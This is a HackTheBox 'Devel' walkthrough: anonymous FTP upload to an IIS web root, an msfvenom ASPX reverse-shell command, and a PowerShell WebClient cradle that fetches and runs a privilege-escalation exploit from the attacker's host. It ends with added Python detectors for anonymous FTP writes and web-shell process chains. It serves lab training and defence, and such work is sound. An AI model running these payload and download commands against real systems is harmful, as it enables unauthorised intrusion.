Devel HackTheBox Write up
Hello again! My name is 0xHuey and I will be sharing my HackTheBox walk-through without Metasploit as I prepare for the GIAC GPEN and OSCP. For those that didn't read my previous post, Metasploit is an extremely powerful pentesting tool that automates a lot of the tasks I will be doing manually. My goal here is to learn how these tools actually work under the hood so that I can become a better infosec enthusiast. So with that said, let's begin!
Difficulty level: Easy-ish
30 mins, no water break, and some googling
Some background on the nmap flags I am using here.
-sV = version detection
-sC = runs the default NSE scripts
-v = verbose output
-Pn = skips host discovery (treats the host as alive instead of pinging it first)
-p- = scans all 65535 ports
-A = aggressive scan: OS detection, version detection, default scripts and traceroute
-T4 = faster timing template to speed things up
So from the top, we see an open FTP server that looks to allow anonymous logins. Next we can see that there is a website, because port 80 is open with HTTP. Nmap also gives us its guess at the operating system the box is running, which is Windows 8.
Since there is potentially a website, I will try to see what is there. Go to 10.10.10.5:80 in a browser. We should be greeted with an Internet Information Services landing page. This is a Microsoft web server. Some further reading shows that IIS 7 shipped with Windows Vista and Windows Server 2008.
Besides this landing page I don't really see much else. So I right-click and select View Page Source. After looking through the source I also don't really see much there.
I decide to run dirb against the site to check whether there are any hidden but publicly reachable web pages. Do the following from your Linux machine.
So my next avenue is the FTP server I found. Use the anonymous login with a random password; it doesn't really matter what you type in, but for this walk-through let's stick with anonymous:anonymous. To connect, run ftp 10.10.10.5.
Once you are in, run ls -al to list the contents of the remote directory.
Now that I can get into this directory, I can see that iisstart.htm, part of what I found earlier on the website, is here. Let me see if I can upload a file to the FTP server and display it on a page.
On my Linux machine I am going to run cat > huey.txt and type Hello.
By the time you've created this text file the FTP server will have kicked you out. So don't worry, just log back in with the creds from earlier. After getting access, use the put command to place the file on the FTP server: put huey.txt, or whatever you called your file. Be sure that you are in the correct local directory when you log in, because ftp uploads from the directory you started it in. So if you saved the text file to your desktop, be in /root/Desktop, then log in to your FTP...
After running the put command, run ls -al to confirm the file is actually there.
Here is where I got a little hung up and had to do some trial and error. After some googling I found that aspnet_client is part of the ASP.NET framework, which runs either ASP or ASPX pages depending on which version was pushed to the server.
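From the defender's side, the thing to catch in the steps above is an anonymous FTP session writing into the web root. The following is an added Python example, not code from the write-up or from the box: it parses IIS FTP W3C logs and flags completed anonymous STOR commands, rating uploads of server-side file types (.asp/.aspx) higher than plain text such as huey.txt. The log lines, the client address 10.10.14.3 and the trimmed field list are constructed for the example.

```python
"""Flag anonymous FTP uploads in IIS FTP W3C logs (added example)."""
import io
import os

# Extensions the IIS web root will execute rather than serve as static content.
SERVER_SIDE_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".exe", ".dll"}

# Constructed sample in IIS FTP W3C extended log format. The field list is the
# usual IIS one trimmed to the columns this check needs; the client address
# 10.10.14.3 and the user 'alice' are made up for the example.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 10.10.14.3 - 10.10.10.5 21 USER anonymous 331
2024-01-01 10:00:01 10.10.14.3 anonymous 10.10.10.5 21 PASS *** 230
2024-01-01 10:00:05 10.10.14.3 anonymous 10.10.10.5 21 STOR huey.txt 226
2024-01-01 10:00:09 10.10.14.3 anonymous 10.10.10.5 21 STOR huey.aspx 226
2024-01-01 10:00:20 10.10.14.3 anonymous 10.10.10.5 21 STOR bad.aspx 550
2024-01-01 10:01:00 10.10.14.7 alice 10.10.10.5 21 RETR report.pdf 226
"""


def parse_w3c(text):
    """Yield one dict per data row, naming columns from the #Fields header."""
    fields = None
    for line in io.StringIO(text):
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue  # other directives (#Software, #Date) and blank lines
        if fields is None:
            raise ValueError("data row before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed row: skip rather than mis-align columns
        yield dict(zip(fields, values))


def find_anonymous_writes(text):
    """Return completed anonymous STOR records, each with a severity label."""
    findings = []
    for rec in parse_w3c(text):
        if rec["cs-username"].lower() != "anonymous":
            continue
        if rec["cs-method"] != "STOR":
            continue
        # 2xx = transfer completed; a 4xx/5xx status means the write was refused.
        if not rec["sc-status"].startswith("2"):
            continue
        ext = os.path.splitext(rec["cs-uri-stem"].lower())[1]
        severity = "high" if ext in SERVER_SIDE_EXTENSIONS else "medium"
        findings.append({
            "time": f'{rec["date"]} {rec["time"]}',
            "client": rec["c-ip"],
            "file": rec["cs-uri-stem"],
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in find_anonymous_writes(SAMPLE_LOG):
        print(f'[{f["severity"]}] {f["time"]} {f["client"]} uploaded {f["file"]}')
```

The severity split matters because a .txt in the web root is an information-disclosure problem at most, while an .aspx in the same directory is code the worker process will run; the refused STOR (status 550) is deliberately left out so a reviewer only sees writes that actually landed.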
MSFvenom is a great tool for creating payloads on the fly to get access to your victim machine.
For more detailed reading on MSFvenom, check out the Offensive-Security page for a quick run down.
I found the following command to generate a payload. Run it from your download directory: msfvenom -p windows/shell_reverse_tcp LHOST=Your IP LPORT=5555 -f aspx > huey.aspx
If you've ever used Metasploit you know that after getting a shell on a victim machine you can run the getuid command and privesc very easily. But if you are not using this tool then things get a little harder.
I go back to Google and start looking for a privesc exploit.
Now run a Python web server from your Linux machine. This can be used on the fly to share files between machines.
I will now upload that exploit to my victim machine with the following PowerShell command:
powershell -c "(new-object System.Net.WebClient).DownloadFile('hxxp://Your IP:9005/40564.exe', 'c:\root\Downloads\40564.exe')"
Now we check the Downloads folder to see if it's there.
Once I confirmed it's there, I run the exploit with the 40564.exe command.
Boom, we are in!
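On the blue-team side, the chain above leaves a distinctive process trail: the IIS worker process (w3wp.exe) spawning cmd.exe, a PowerShell System.Net.WebClient download, and the application-pool identity running a binary out of a drop directory. This added Python example (mine, not the author's) triages process-creation records for those three patterns. The records are constructed to look like Sysmon Event ID 1 / Security 4688 data reduced to four fields; the paths, the app-pool name IIS APPPOOL\Web, the user CORP\alice and the 10.0.0.9 address stand in for real values.

```python
"""Triage process-creation events for web-shell style activity (added example)."""
import ntpath
import re

# Interpreters that an IIS worker process has no business launching.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Download-cradle signature: WebClient followed by one of its Download* methods.
WEBCLIENT_RE = re.compile(
    r"System\.Net\.WebClient.*?Download(File|String|Data)\(", re.IGNORECASE
)

# Directories an app-pool identity should not be executing binaries from.
DROP_DIRS = ("\\downloads\\", "\\temp\\", "\\tmp\\", "\\appdata\\local\\temp\\")

# Constructed sample events (parent, image, user, cmdline) mirroring the steps
# above; the app pool name, user and 10.0.0.9 are made-up values.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "user": r"IIS APPPOOL\Web", "cmdline": "cmd.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "user": r"IIS APPPOOL\Web",
     "cmdline": "powershell -c \"(new-object System.Net.WebClient)"
                ".DownloadFile('http://10.0.0.9:9005/40564.exe', "
                "'c:\\root\\Downloads\\40564.exe')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "user": r"CORP\alice", "cmdline": "powershell Get-Process"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\root\Downloads\40564.exe",
     "user": r"IIS APPPOOL\Web", "cmdline": "40564.exe"},
]


def triage(events):
    """Return (event index, rule name) pairs for every rule each event trips."""
    hits = []
    for i, ev in enumerate(events):
        parent = ntpath.basename(ev["parent"]).lower()
        image = ntpath.basename(ev["image"]).lower()
        image_dir = ntpath.dirname(ev["image"]).lower() + "\\"
        is_apppool = ev["user"].upper().startswith("IIS APPPOOL\\")

        # Rule 1: the IIS worker itself launching a shell (web shell / ASPX payload).
        if parent == "w3wp.exe" and image in SHELLS:
            hits.append((i, "w3wp_spawned_shell"))

        # Rule 2: an in-line WebClient download cradle on the command line.
        if WEBCLIENT_RE.search(ev["cmdline"]):
            hits.append((i, "webclient_download"))

        # Rule 3: the app-pool identity executing something from a drop directory.
        if is_apppool and image not in SHELLS and any(d in image_dir for d in DROP_DIRS):
            hits.append((i, "apppool_ran_dropped_binary"))
    return hits


if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{rule}] {ev['user']}: {ev['parent']} -> {ev['cmdline']}")
```

Rule 1 is the highest-signal of the three on a web server, because w3wp.exe launching cmd.exe or powershell.exe almost never happens in normal operation; rules 2 and 3 are noisier on an administrator's workstation (the CORP\alice event shows a benign PowerShell invocation passing through untouched), so in practice they are scoped to service identities such as the IIS app pool.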